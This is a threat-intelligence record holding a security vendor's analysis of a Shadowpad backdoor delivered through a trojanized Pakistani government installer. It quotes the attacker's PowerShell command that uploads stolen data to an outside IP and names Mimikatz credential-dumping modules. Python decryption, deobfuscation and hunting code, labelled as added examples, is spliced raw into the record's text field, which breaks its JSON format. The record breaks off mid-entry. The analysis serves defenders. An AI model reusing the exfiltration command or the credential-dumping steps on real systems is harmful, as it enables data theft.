{
	"id": "9d5cb316-96d7-4db8-98cc-6d0ab22a0833",
	"created_at": "2026-04-06T00:09:19.813043Z",
	"updated_at": "2026-04-10T03:36:48.423785Z",
	"deleted_at": null,
	"sha1_hash": "6a20cb5969a28df564f267d3604acaf0be156a18",
	"title": "Possible Supply Chain Attack Targeting Pakistani Government Delivers Shadowpad",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 786369,
	"plain_text": "Possible Supply Chain Attack Targeting Pakistani Government Delivers\r\nShadowpad\r\nBy By: Daniel Lunghi Jul 14, 2023 Read time: 11 min (2941 words)\r\nPublished: 2023-07-14 · Archived: 2026-04-05 13:54:32 UTC\r\nUpdate: As of July 17, the Pakistani government agency in question has found no compromise of its build environment. As\r\nthe MSI installer file is not signed, we cannot remove the possibility that the threat actor obtained the legitimate installer\r\nand modified it to add the malicious files found in our analysis, and that users were lured to run this Trojanized version via\r\nsocial engineering attacks. They are currently carrying out a detailed forensic analysis of their systems to thoroughly\r\ninvestigate this incident.\r\nHowever, we also note that the legitimate installer was not publicly available at the time of the incident (late September\r\n2022). In addition, two different entities were compromised two days apart in this incident.\r\nWe recently found that an MSI installer of the Pakistani government app E-Office delivered a Shadowpad sample,\r\nsuggesting a possible supply-chain attack.\r\nShadowpad is an advanced malware family that was discovered in 2017 after a supply-chain attack on a popular piece of\r\nserver management software attributed to APT41. Since 2019, this malware has been shared among multiple Chinese threat\r\nactors such as Earth Akhlut or Earth Lusca.\r\nThe sample that was delivered implemented an updated version of the obfuscation technique discussed by PTSecurity in\r\nJanuary 2021.\r\nMSI installer analysis\r\nThe MSI installer’s metadata contains tags mentioning the eOffice and its developing agency.\r\nFigure 1. MSI installer file properties\r\nE-Office is described as \"helping the government departments to go paperless. 
It is aimed at improving internal efficiencies in an organization through electronic administration.\" This description suggests that E-Office is only delivered to government organizations. After some research, we learned that this piece of software is intended for government entities only and is not publicly available, which reinforces our belief that the incident could be a supply-chain attack.\r\nThree files were added to the legitimate MSI installer:\r\nTelerik.Windows.Data.Validation.dll\r\nmscoree.dll\r\nmscoree.dll.dat\r\nhttps://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html\r\nPage 1 of 9\n\nTelerik.Windows.Data.Validation.dll is a 64-bit PE executable (not a DLL, despite its name), which turns out to be the legitimate applaunch.exe file signed by Microsoft. This executable is known to be abused by multiple threat actors to sideload malicious files named mscoree.dll.\r\nMeanwhile, mscoree.dll is a malicious DLL that decrypts and loads the mscoree.dll.dat file, which is the Shadowpad payload.\r\nThe MSI installer has a custom action named “TelerikValidation” with type 3170 that runs the file Telerik.Windows.Data.Validation.dll without any parameter from the installation folder.\r\nFigure 2. MSI CustomAction table\r\nThe type value 3170 is the sum of the following msidbCustomActionType flags:\r\n34 (2 + 32): an EXE file (msidbCustomActionTypeExe) whose path is relative to a directory named in the Source column (msidbCustomActionTypeDirectory)\r\n3072 (1024 + 2048): deferred execution, queued at a schedule point within the installation script (msidbCustomActionTypeInScript), with no user impersonation (msidbCustomActionTypeNoImpersonate), so the action runs in the SYSTEM context\r\n64: synchronous execution that ignores the exit code and continues (msidbCustomActionTypeContinue; the asynchronous bit, 128, is not set)\r\nThis TelerikValidation custom action is listed in the InstallExecuteSequence and is launched after the files have been installed (InstallFiles) but before the shortcuts and registry keys are created.\r\nFigure 3. 
MSI InstallExecuteSequence table\r\nNow let us analyze the piece of malware delivered by the backdoored MSI installer.\r\nShadowpad analysis\r\nThe applaunch.exe file copied to the E-Office folder is a legitimate file signed by Microsoft. As mentioned above, this version is known to be vulnerable to DLL sideloading: any file named mscoree.dll placed in the same directory as applaunch.exe is loaded into the process, and its export named “IEE” is called. Threat actors have abused this behavior for many years to sideload malicious DLLs.\r\nLooking at the code of the IEE export, we notice that the threat actor checks some bytes of the loading executable at a hard-coded offset to verify that they match a particular value. If they do not, the DLL terminates. This check is an anti-sandbox measure: sandboxes commonly run DLLs via rundll32.exe or similar launchers rather than via the legitimate yet vulnerable executable, so the DLL only runs when hosted by the expected binary.\r\nAfter that check, the rest of the code is obfuscated.\r\nDLL and payload obfuscation\r\nWe noticed two different obfuscation techniques, both of which are used in the DLL and in the decrypted payload.\r\nThe first technique prevents the disassembler from statically following the code flow: every instruction is followed by a call to a function that calculates the address of the next instruction. The disassembler loses track of the real flow and decodes the wrong instructions, making static analysis extremely difficult.\r\nThis technique is an evolution of what PTSecurity first described in 2021, where the same function was called after each instruction to jump to the next one.\r\nIn this updated version, the called function is always different. 
Where the previous version read the four bytes following the “call” instruction, the updated version performs an additional operation (ADD, SUB, or XOR) between the gathered value and a fixed constant that differs in every function. The calculated value is pushed onto the stack and the function executes a RET instruction to redirect the code flow to that address.\r\nFigure 4. Code flow obfuscation\r\nIn Figure 4, for example, the four bytes encircled in red are read by the calc_addr_next_instruction_1 function. The resulting value is then XORed with a hard-coded constant specific to this function, and the result is added to the value encircled in yellow to get the address of the next instruction. Hundreds of similar functions exist within the code of the DLL and of the payload.\r\nThe second technique does not obfuscate the code flow. Instead, it adds useless instructions and branches that are never taken: thousands of comparisons between a register and zero, each followed by a conditional branch. Since the register value is never zero, the branch is never taken, and the disassembly fills up with pointless comparisons and dead code, which is burdensome for analysts.\r\nWe managed to find multiple samples using these two obfuscation techniques. The oldest one we found was uploaded to VirusTotal in late February 2022. However, we did not find it in our telemetry, nor were we able to identify the threat actor behind this file.\r\nConfiguration file\r\nThe configuration file is available in memory only, in encrypted form.\r\nFigure 5. First part of the encrypted configuration\r\nFigure 6. 
Second part of the encrypted configuration (truncated)\r\nThe simplified structure is as follows:\r\nFour-byte configuration header (boxed in red)\r\nList of the offsets of the encrypted items (boxed in yellow), two bytes per offset\r\nIP addresses of DNS servers (in this case 8.8.8.8, 8.8.4.4, 4.4.4.4 and 4.2.2.2, boxed in green)\r\nEncrypted items: for every encrypted item, a two-byte encryption key (boxed in pink) followed by the encrypted item itself (boxed in blue)\r\nIt is important to note that the encryption scheme differs from what we saw in previous Shadowpad versions. Historically, the Shadowpad configuration was encrypted with a custom algorithm, with different threat actors using different algorithms or constants.\r\nIn this case, every Shadowpad sample that we found encrypted its configuration with the same algorithm:\r\nA 16-byte base encryption key is concatenated with the two bytes (boxed in pink in the configuration figures above) that differ for each item of the configuration file\r\nThe MD5 hash of the resulting 18 bytes is calculated\r\nThat MD5 hash is passed to the CryptDeriveKey function, which derives 16 bytes from it\r\nThose 16 bytes are used as the AES-128-CBC encryption key, with 16 zero bytes as the initialization vector\r\nA variant of this encryption scheme was documented by PwC in a report from December 2021.\r\nThe oldest sample we found using this encryption scheme was uploaded to VirusTotal in March 2021. 
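Returning to the first obfuscation technique described in the DLL and payload obfuscation section: the following Python is an added example written for this page, not code from the report and not the malware authors' code, that models the redirection and resolves a chain of such calls. It assumes, beyond what the page states, that the 4-byte operand read by a calc_addr function is the one immediately following the 5-byte call that invoked it, that the operation result is added to that call's return address, that the 32-bit result is a signed displacement so backward jumps are possible, and that the operation and constant of each handler are already known from analysis. The handler table and the code bytes are constructed for the example.

```python
import struct

MOD32 = 0x100000000

# Per-handler (operation, constant). Addresses and constants are constructed for this
# example; in a real sample they come from analysing each calc_addr_next_instruction_N
# function (the page reports hundreds of them per binary).
HANDLERS = {
    0x140001000: ('xor', 0x5A5A5A5A),
    0x140001100: ('add', 0x00001234),
    0x140001200: ('sub', 0x0000FFFF),
}

def apply_op(op, value, const):
    # The per-function operation, evaluated on 32-bit unsigned values.
    if op == 'xor':
        return (value ^ const) % MOD32
    if op == 'add':
        return (value + const) % MOD32
    if op == 'sub':
        return (value - const) % MOD32
    raise ValueError('unknown operation: ' + op)

def invert_op(op, const, displacement):
    # Obfuscator side: the operand that must follow the call so apply_op yields displacement.
    if op == 'xor':
        return (displacement ^ const) % MOD32
    if op == 'add':
        return (displacement - const) % MOD32
    if op == 'sub':
        return (displacement + const) % MOD32
    raise ValueError('unknown operation: ' + op)

def to_signed32(value):
    # Assumption: the 32-bit result is a signed displacement from the return address.
    return value - MOD32 if value >= 0x80000000 else value

def next_instruction(code, base, call_addr, handlers):
    # Resolve one call: E8 rel32 to a handler, then the 4-byte operand the handler reads.
    off = call_addr - base
    if code[off] != 0xE8:
        raise ValueError('no call at 0x%x' % call_addr)
    rel = struct.unpack_from('<i', code, off + 1)[0]
    ret_addr = call_addr + 5
    handler = ret_addr + rel
    op, const = handlers[handler]
    operand = struct.unpack_from('<I', code, off + 5)[0]
    return ret_addr + to_signed32(apply_op(op, operand, const))

def resolve_chain(code, base, start, handlers, limit=256):
    # Follow calls until a byte that is not a call is reached (a real instruction).
    # Returns the list of resolved addresses and the final real-instruction address.
    trace = []
    addr = start
    for _ in range(limit):
        if code[addr - base] != 0xE8:
            return trace, addr
        addr = next_instruction(code, base, addr, handlers)
        trace.append(addr)
    raise RuntimeError('chain longer than limit; probable loop')

def emit_call(code, base, at, handler, op, const, target):
    # Obfuscator side, used here only to build the constructed sample bytes:
    # writes call handler followed by the operand that makes the handler land on target.
    ret_addr = at + 5
    operand = invert_op(op, const, (target - ret_addr) % MOD32)
    struct.pack_into('<BiI', code, at - base, 0xE8, handler - ret_addr, operand)

def build_sample(base=0x140002000):
    # Constructed 0x50 bytes of int3 filler with a three-hop chain:
    # base+0x00 -> base+0x20 -> base+0x10 (backward) -> base+0x40, which holds a nop.
    code = bytearray([0xCC] * 0x50)
    emit_call(code, base, base + 0x00, 0x140001000, 'xor', 0x5A5A5A5A, base + 0x20)
    emit_call(code, base, base + 0x20, 0x140001100, 'add', 0x00001234, base + 0x10)
    emit_call(code, base, base + 0x10, 0x140001200, 'sub', 0x0000FFFF, base + 0x40)
    code[0x40] = 0x90
    return bytes(code), base

if __name__ == '__main__':
    code, base = build_sample()
    trace, final = resolve_chain(code, base, base, HANDLERS)
    print('hops: ' + ', '.join('0x%x' % a for a in trace))
    print('next real instruction at 0x%x' % final)
```

In practice the handler table is the output of a first pass that classifies each calc_addr_next_instruction_N body by its arithmetic instruction and immediate; with that table, resolve_chain can drive a scripted disassembler to patch every call into a direct jump to the resolved address, which restores a flow that static tools can follow.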
That March 2021 sample did not appear in our telemetry either, and we were not able to identify the threat actor behind it.\r\nDecrypting the different items of the configuration file yields multiple pieces of information, including the following:\r\nFile paths and file names\r\nRegistry keys used for persistence\r\nService names and descriptions\r\nFull paths of the processes to inject into\r\nList of command-and-control (C\u0026C) servers\r\nList of proxies\r\nList of DNS servers\r\nUser agents and other HTTP headers\r\nA campaign note\r\nIt should be noted that any field can be empty.\r\nThe following are the different “campaign notes” that we found in the samples related to this threat actor, each with our comment:\r\n0908_0908: probably related to the date of the campaign that took place on September 8, 2022\r\nREVER-0512: probably related to the date of the campaign that took place on May 12, 2022\r\n20220215: probably related to the campaign that took place on February 15, 2022\r\n1114: probably related to the campaign on November 14, which likely took place in 2021\r\ncsp.live.obo: “live” and “obo” are probably references to the C\u0026C servers found in the configuration (live.musicweb[.]xyz and obo.videocenter[.]org), while “csp” might mean “communications service provider”\r\nPivots on the obfuscation and encryption schemes\r\nAs mentioned above, we used the obfuscation techniques and the encryption scheme to pivot and find related samples. In total, we found 11 Shadowpad loaders and six payloads related to this threat actor. Furthermore, we found 25 additional Shadowpad loaders and five additional payloads that we could not link with strong confidence to this threat actor.\r\nAmong these samples, nine different base encryption keys were used. 
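The base key is what differs between those nine; the per-item AES key is derived from it. As an added example (not code from the report), the following Python performs that derivation exactly as the scheme described in the Configuration file section: MD5 over the 16-byte base key concatenated with the item's 2-byte key, then CryptDeriveKey, then AES-128-CBC with a zero IV. The CryptDeriveKey emulation follows the algorithm Microsoft documents for non-SHA-2 hashes, including the expansion branch for keys longer than the hash, which the page's 16-byte case never reaches. The base key, item bytes and offsets below are constructed, not values from any sample; decrypt_item needs the third-party cryptography package and is the only function that does.

```python
import hashlib

ZERO_IV = bytes(16)

def crypt_derive_key(hash_value, key_len, hash_name='md5'):
    # Emulates CryptDeriveKey for non-SHA-2 hashes as Microsoft documents it:
    # if the requested key is no longer than the hash, the key is a prefix of the hash;
    # otherwise the hash is laid into two 64-byte buffers XORed with 0x36 and 0x5C,
    # each buffer is hashed again, and the concatenation is truncated to key_len.
    if key_len <= len(hash_value):
        return hash_value[:key_len]
    def padded(const):
        buf = bytearray([const] * 64)
        for i, b in enumerate(hash_value):
            buf[i] = b ^ const
        return bytes(buf)
    inner = hashlib.new(hash_name, padded(0x36)).digest()
    outer = hashlib.new(hash_name, padded(0x5C)).digest()
    return (inner + outer)[:key_len]

def item_aes_key(base_key, item_key):
    # The page's scheme: MD5(base_key || item_key) -> CryptDeriveKey -> 16-byte AES-128 key.
    if len(base_key) != 16 or len(item_key) != 2:
        raise ValueError('expected a 16-byte base key and a 2-byte item key')
    digest = hashlib.md5(base_key + item_key).digest()
    return crypt_derive_key(digest, 16)

def split_item(item):
    # An encrypted item as laid out in the configuration: 2-byte key, then ciphertext.
    if len(item) < 2:
        raise ValueError('item too short')
    return item[:2], item[2:]

def decrypt_item(base_key, item):
    # AES-128-CBC with a zero IV. Padding handling is not described on the page, so the
    # raw CBC output is returned. Requires the third-party cryptography package (assumed).
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    item_key, ciphertext = split_item(item)
    if len(ciphertext) % 16 != 0:
        raise ValueError('ciphertext is not a multiple of the AES block size')
    cipher = Cipher(algorithms.AES(item_aes_key(base_key, item_key)), modes.CBC(ZERO_IV))
    decryptor = cipher.decryptor()
    return decryptor.update(ciphertext) + decryptor.finalize()

def derive_all(base_key, items):
    # For a list of (offset, item_bytes) pairs pulled from the offset table, returns
    # {offset: aes_key_hex} so per-item keys can be compared across samples.
    return {offset: item_aes_key(base_key, split_item(item)[0]).hex() for offset, item in items}

if __name__ == '__main__':
    base = bytes.fromhex('00112233445566778899aabbccddeeff')   # constructed, not a real key
    items = [(0x40, bytes.fromhex('0001') + bytes(32)),       # constructed items
             (0x62, bytes.fromhex('0002') + bytes(16))]
    for offset, key_hex in derive_all(base, items).items():
        print('item at 0x%x: AES key %s' % (offset, key_hex))
```

When pivoting across samples, compare the 16-byte base key rather than the derived per-item keys: the latter change with every item, while the base key is the value the report counts (nine in total, two tied to this threat actor).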
Two of those nine keys are tied to our threat actor, while we have no strong attribution for the seven remaining keys. As Shadowpad has been known to be a shared backdoor since at least 2019, it is likely that other threat actors also have access to this updated version.\r\nOn three samples sharing one of the seven remaining encryption keys, we noticed that specific profiles hosted on the social.msdn.microsoft.com domain were used as dead drop resolvers (DDR) to obtain the final C\u0026C server. Notably, APT41 has used this technique in the past. However, all the involved profile pages were offline, so we could neither retrieve the final C\u0026C server nor confirm the APT41 attribution.\r\nNetwork stealth\r\nWhen first analyzing the malicious MSI installer, we noticed a TCP connection to the IP address 10.2.101.110 on port 50000. After analyzing the Shadowpad malware sample, we confirmed that this was indeed the C\u0026C IP address and port set in the configuration.\r\nHowever, we also noticed that running a clean E-Office version provoked connections to the same IP and port. After a more thorough investigation involving TLS interception (a man-in-the-middle, MitM, setup), we discovered that the legitimate E-Office application makes a GET request to hxxps://10.2.101.110:50000/VI/Application/CheckForApplicationUpdate/1 with some custom HTTP headers such as “Sender: eOffice.Client.WPF”, “machine_name”, “app_version”, or “os_type”, while the malware makes a POST request to hxxps://10.2.101.110:50000/5BE96B824C4AD5A.\r\nFigure 7. Legitimate network connection by E-Office application\r\nWe did not search further, as the URL is self-explanatory. It is likely that the legitimate E-Office application connects to this IP address and port to check for updates. It also seems very unlikely that every Pakistani government organization that deploys E-Office has the same network mapping. 
However, we do not know whether the address of the update server can be configured or whether it was unintentionally left in as a debug feature by the developers.\r\nIn any case, choosing an IP address that is hard-coded in a legitimate application used by their targets was a clever move by the attackers.\r\nOn the defender’s side, we recommend searching for POST requests to the IP address 10.2.101.110 on port 50000, as the legitimate application seems to send only GET requests. It is also noticeable that with the malicious installer the connection happens right after the installation process is launched, whereas with a clean installer the connection is only triggered once the E-Office application is run.\r\nTargets\r\nWe found three targets within our telemetry, all located in Pakistan: two are from the government/public sector and are oriented toward finance, while one is a telecommunications provider.\r\nThe first victim we found was a Pakistani government entity, and we could confirm that the Shadowpad sample landed on the victim after the backdoored E-Office installer analyzed in a previous section was executed. The infection took place on September 28, 2022.\r\nThe second victim was a Pakistani public sector bank. In this incident, different Shadowpad samples were detected on September 30, 2022 after E-Office was installed. We could not retrieve the related E-Office installer.\r\nOther related Shadowpad samples were detected at a Pakistani telecommunications provider in May 2022. Later analysis showed that one of them had been there since mid-February 2022. 
We were unable to find the infection vector for this incident.\r\nPost-exploitation and data exfiltration\r\nWithin our telemetry, we noticed that the attacker used a portable Mimikatz variant the day after a Shadowpad sample appeared. Although we could not confirm it because we did not have access to the file, we found traces of the strings privilege::debug followed by sekurlsa::logonpasswords, which match the Mimikatz sekurlsa module that dumps LSASS secrets.\r\nFour days after that, we found traces of data exfiltration. The threat actor used a very simple PowerShell command that relies on the Background Intelligent Transfer Service (BITS):\r\npowershell  -nop -exec bypass \"\"import-module bitstransfer;start-bitstransfer -source c:\\windows\\help\\1019.rar -destination http://158.247.230.255/1019.rar -transfertype upload\"\"\r\nWe could not retrieve the exfiltrated file. However, by looking at OSINT sources, we learned that the threat actor likely had control over that IP address from late April 2022 to late October 2022.\r\nAttribution\r\nWe did not find enough evidence to attribute this attack to a known threat actor.\r\nAs mentioned earlier, since Shadowpad is a shared malware family, we cannot rely on it to attribute the attack to a particular threat actor.\r\nFor two of the three victims of this campaign, we could not find any further malware samples or tactics, techniques, and procedures (TTPs) that could help attribute the campaign. In the third victim’s environment, however, we found multiple malware families that we analyzed in our search for links to known threat actors.\r\nNotably, we found one dropper described by PTSecurity and by Dr. Web (under the name “Trojan.Misisc.1”) that we could attribute with high confidence to the Calypso threat actor. 
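The hunts suggested in the Network stealth section and in the post-exploitation section above, as an added example written for this page (not code from the report): the GET-versus-POST check for 10.2.101.110:50000, combined with the observation that a malicious install connects from the installer rather than from the E-Office client, plus a command-line check for the BITS upload and the Mimikatz module strings. Event layouts, timestamps and process names are constructed; the BITS command line is the one quoted above, rebuilt character by character so that the sample contains no raw quotes or backslashes.

```python
from urllib.parse import urlsplit

EOFFICE_UPDATE_HOST = '10.2.101.110'
EOFFICE_UPDATE_PORT = 50000
EOFFICE_UPDATE_PATH = '/VI/Application/CheckForApplicationUpdate/'
EOFFICE_SENDER = 'eOffice.Client.WPF'
# Processes that should never be the client of the update server: the installer itself
# and the renamed applaunch.exe that the custom action runs (both named on the page).
INSTALL_TIME_PROCESSES = ('msiexec.exe', 'telerik.windows.data.validation.dll')
MIMIKATZ_MARKERS = ('privilege::debug', 'sekurlsa::logonpasswords')
DQ = chr(34)                 # double-quote character
QUOTE_CHARS = DQ + chr(39)   # double and single quotes, stripped from command-line tokens

def classify_http(event):
    # event: dict with process, method, url and headers. Returns a reason string when a
    # request to the E-Office update host does not look like the legitimate update check.
    u = urlsplit(event['url'])
    if u.hostname != EOFFICE_UPDATE_HOST or u.port != EOFFICE_UPDATE_PORT:
        return None
    reasons = []
    if event['method'].upper() != 'GET':
        reasons.append('non-GET method ' + event['method'])
    if not u.path.startswith(EOFFICE_UPDATE_PATH):
        reasons.append('unexpected path ' + u.path)
    if event['headers'].get('Sender') != EOFFICE_SENDER:
        reasons.append('missing eOffice Sender header')
    if event['process'].lower() in INSTALL_TIME_PROCESSES:
        reasons.append('connection initiated during installation by ' + event['process'])
    return '; '.join(reasons) or None

def parse_bits_upload(cmdline):
    # Returns (source, destination) when the command line drives a BITS upload through
    # Start-BitsTransfer, else None. Case-insensitive; tolerates doubled or stray quotes.
    tokens = [t.strip(QUOTE_CHARS) for t in cmdline.split()]
    lowered = [t.lower() for t in tokens]
    if not any('start-bitstransfer' in t for t in lowered):
        return None
    params = {}
    for i, t in enumerate(lowered):
        if t.startswith('-') and i + 1 < len(tokens):
            params[t] = tokens[i + 1]
    if params.get('-transfertype', '').lower() != 'upload':
        return None
    return params.get('-source'), params.get('-destination')

def classify_process(cmdline):
    low = cmdline.lower()
    reasons = []
    hits = [m for m in MIMIKATZ_MARKERS if m in low]
    if hits:
        reasons.append('Mimikatz module strings: ' + ', '.join(hits))
    bits = parse_bits_upload(cmdline)
    if bits:
        src, dst = bits
        host = urlsplit(dst).hostname if dst else None
        reasons.append('BITS upload of %s to %s' % (src, host))
    return '; '.join(reasons) or None

def hunt(http_events, process_cmdlines):
    alerts = []
    for e in http_events:
        r = classify_http(e)
        if r:
            alerts.append((e['ts'], 'http', r))
    for c in process_cmdlines:
        r = classify_process(c)
        if r:
            alerts.append(('-', 'process', r))
    return alerts

HTTP_EVENTS = [   # constructed events; process names are illustrative
    {'ts': '2022-09-28T09:12:01Z', 'process': 'eOffice.exe', 'method': 'GET',
     'url': 'https://10.2.101.110:50000/VI/Application/CheckForApplicationUpdate/1',
     'headers': {'Sender': 'eOffice.Client.WPF', 'app_version': '1.0'}},
    {'ts': '2022-09-28T09:30:44Z', 'process': 'Telerik.Windows.Data.Validation.dll',
     'method': 'POST', 'url': 'https://10.2.101.110:50000/5BE96B824C4AD5A', 'headers': {}},
    {'ts': '2022-09-28T09:31:00Z', 'process': 'chrome.exe', 'method': 'POST',
     'url': 'https://example.com/login', 'headers': {}},
]
BS = chr(92)   # backslash, so the reconstructed command line needs no escaping here
BITS_CMD = ('powershell -nop -exec bypass ' + DQ + DQ + 'import-module bitstransfer;'
            + 'start-bitstransfer -source c:' + BS + 'windows' + BS + 'help' + BS + '1019.rar'
            + ' -destination http://158.247.230.255/1019.rar -transfertype upload' + DQ + DQ)
PROCESS_EVENTS = [   # first line constructed; second is the command quoted in the report
    'mimikatz.exe privilege::debug sekurlsa::logonpasswords',
    BITS_CMD,
]

if __name__ == '__main__':
    for ts, kind, reason in hunt(HTTP_EVENTS, PROCESS_EVENTS):
        print(ts, kind, reason)
```

The installer-time heuristic is the one the page singles out: a clean installer never talks to the update server, only the running E-Office client does, so any hit on 10.2.101.110:50000 from msiexec.exe or from the renamed applaunch.exe is worth a ticket even before the method and path are examined.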
That dropper’s payload was a simple keylogger.\r\nAnother malware sample that we found turned out to be what PTSecurity describes as Deed RAT in its report on the Space Pirates threat actor. Our analysis shows that, rather than a new malware family, this is likely a Shadowpad variant that is obfuscated differently and uses a different encryption scheme. We claim with low confidence that this piece of malware also belongs to the Calypso threat actor’s toolkit.\r\nThe last malware family that we found belongs to the DriftingCloud threat actor. As far as we know, DriftingCloud is not known to use Windows malware. Additionally, we found the same sample targeting a totally different location and industry, reinforcing our opinion that this sample is probably unrelated to the threat actor.\r\nUnfortunately, we could not find any clear links between these pieces of malware and the Shadowpad samples related to our threat actor. Therefore, we prefer to refrain from making any uncertain attribution claim.\r\nBronze University Shadowpad sample\r\nIn February 2022, Dell SecureWorks wrote a report on Shadowpad in which multiple threat actors are described as using this malware family. In the list of indicators of compromise (IOCs), we noticed that the payload 253f474aa0147fdcf88beaae40f3a23bdadfc98b8dd36ae2d81c387ced2db4f1 uses the new encryption scheme that we described previously, with a base encryption key that we attribute to our threat actor. The related C\u0026C domain names are live[.]musicweb[.]xyz and obo[.]videocenter[.]org. 
Kaspersky lists those domain names in a report mentioning targets in the industrial and telecommunications sectors in both Pakistan and Afghanistan, but does not include strong attribution links.\r\nDell SecureWorks attributes this sample to Bronze University, which matches the threat actor we call Earth Lusca. However, we question this attribution. All the other Shadowpad samples attributed to Bronze University in the IOC list are named log.dll.dat, while our payload is named iviewers.dll.dat. Moreover, none of those samples uses the new encryption scheme that we described previously; they use the old encryption scheme described by PwC, with the 0x107e666d constant. Finally, the C\u0026C domain names of the 253f474aa0147fdcf88beaae40f3a23bdadfc98b8dd36ae2d81c387ced2db4f1 payload do not match the usual Earth Lusca registration pattern that we know of.\r\nThus, we prefer to refrain from attributing this whole attack to Earth Lusca. However, we will be happy to correct our assessment in the future if we find further proof of links between this campaign and Earth Lusca.\r\nConclusion\r\nFrom what we have seen so far, this whole campaign was the work of a very capable threat actor that managed to retrieve and modify the installer of a governmental application to compromise at least three sensitive targets.\r\nThe fact that the threat actor has access to a recent version of Shadowpad potentially links it to the nexus of Chinese threat actors, although we cannot point to a particular group with confidence. However, we managed to show how the Shadowpad authors continue to update their malware, making its reverse engineering more difficult. 
Finally, we detailed how this threat actor carefully chose one of its C\u0026C addresses to blend in with legitimate network traffic, which shows great preparation capability.\r\nWe expect to see more threat actors using this updated Shadowpad version in the future.\r\nIndicators of Compromise (IOCs)\r\nSHA256 | Detection name | Malware family\r\nc1feef03663a9aa920a9ab4eb2ab7adadb3f2a60db23a90e5fe9b949d4ec22b6 | Backdoor.Win64.SHADOWPAD.AS | Backdoored eOffice installer\r\n4e3a455e7f0b8f34385cd8320022719a8fc59d8bc091472990ac9a56e982a965 | Backdoor.Win64.SHADOWPAD.AS | Shadowpad loader\r\n17272a56cbf8e479c085e88fe22243685fac2bc041bda26554aa716287714466 | Backdoor.Win64.SHADOWPAD.AS.enc | Shadowpad loader\r\nc35b8514e3b2649e17c13fd9dc4796dbc52e38e054d518556c82e6df38ca4c1b | Backdoor.Win64.SHADOWPAD.AS | Shadowpad loader\r\nd6f184dae03d4ddae8e839dd2161d9cd03d3b25421b4795edab0f5ad9850d091 | Backdoor.Win64.SHADOWPAD.AS | Shadowpad loader\r\nf8c5feaae3f8e4bfb37edf4e05d1ee91797023bdf71e1c45ed2711861b300f37 |  | Shadowpad loader\r\n0122734490fe4dfb287d34394667d81ab46e0d05d4569d06a41f0f3c3a36448c | Possible_SMPOPPINGBEEZBJF-A | Shadowpad loader\r\nbdc6a2985a07ef3c5d2ef2a0eb53afdfdbf757bfa080e8b77ba4b47c1a99b423 | Trojan.Win64.POPPINGBEE.ZBJF | Shadowpad loader\r\n4805a7a386fac1af9a80ab24d95ebf4699c35a7c38fcf3eefa571b9d67d7bf45 | Backdoor.Win64.POPPINGBEE.ZAJF.enc | Shadowpad payload\r\n8b5e918595c27db3bcafd59a86045605837bc5843c938039852218d72cf2c253 | Backdoor.Win64.POPPINGBEE.ZAJF.enc | Shadowpad payload\r\n953e3ed35d84c4a7c4a599f65b2fbd6475b474e9b4bf85581255f1d81d2b5e4e | Backdoor.Win64.SHADOWPAD.AS.enc | Shadowpad payload\r\n6dea7f976a3dc359e630ab5e85fa69f114fc046dcc363598e998e1ef9751bbed | Backdoor.Win64.SHADOWPAD.AS | Shadowpad loader\r\n7e8c6961a10c95a5d97aece92c2e2d974d63ede98196413cc0cf033f92084f53 | Possible_SMPOPPINGBEEZBJF-A | Shadowpad loader\r\ndde04eaac96964e86b8734f67f3b6741505fdc5e177dd58e85da12a8120a44bf | Possible_SMPOPPINGBEEZBJF-A | Shadowpad loader\r\n16c6558634759e6efd4581de60cc2050d99a53245c6abde3d38fc140204777e9 | Backdoor.Win64.SHADOWPAD.AS | Shadowpad loader\r\n253f474aa0147fdcf88beaae40f3a23bdadfc98b8dd36ae2d81c387ced2db4f1 | Backdoor.Win64.SHADOWPAD.AS.enc | Shadowpad payload\r\n05ed1feda4a1684f8f7907644500948f4488a60ecb0740f708e08c1812b7f122 | Backdoor.Win64.SHADOWPAD.AS.enc | Shadowpad payload\r\n225b0adce4fab783d0962852894482e7452e5483bf955757cb25e6a26c3d3b38 | Trojan.Win64.POPPINGBEE.A | \r\nC\u0026C\r\nHTTPS://tech.learningstudy.xyz:443\r\nHTTPS://live.musicweb.xyz:443\r\nHTTPS://obo.videocenter.org:443\r\nHTTPS://45.76.144.182:443\r\nSource: https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html"
	],
	"report_names": [
		"supply-chain-attack-targeting-pakistani-government-delivers-shad.html"
	],
	"threat_actors": [
		{
			"id": "536ca49a-2666-4005-8a50-e552fc7e16ef",
			"created_at": "2023-11-21T02:00:07.375813Z",
			"updated_at": "2026-04-10T02:00:03.471967Z",
			"deleted_at": null,
			"main_name": "Webworm",
			"aliases": [
				"Space Pirates"
			],
			"source_name": "MISPGALAXY:Webworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c42fe131-a81c-45bb-8f32-61f39263a7d4",
			"created_at": "2023-11-17T02:00:07.60084Z",
			"updated_at": "2026-04-10T02:00:03.45671Z",
			"deleted_at": null,
			"main_name": "DriftingCloud",
			"aliases": [],
			"source_name": "MISPGALAXY:DriftingCloud",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "58db0213-4872-41fe-8a76-a7014d816c73",
			"created_at": "2023-01-06T13:46:38.61757Z",
			"updated_at": "2026-04-10T02:00:03.040816Z",
			"deleted_at": null,
			"main_name": "Tonto Team",
			"aliases": [
				"G0131",
				"PLA Unit 65017",
				"Earth Akhlut",
				"TAG-74",
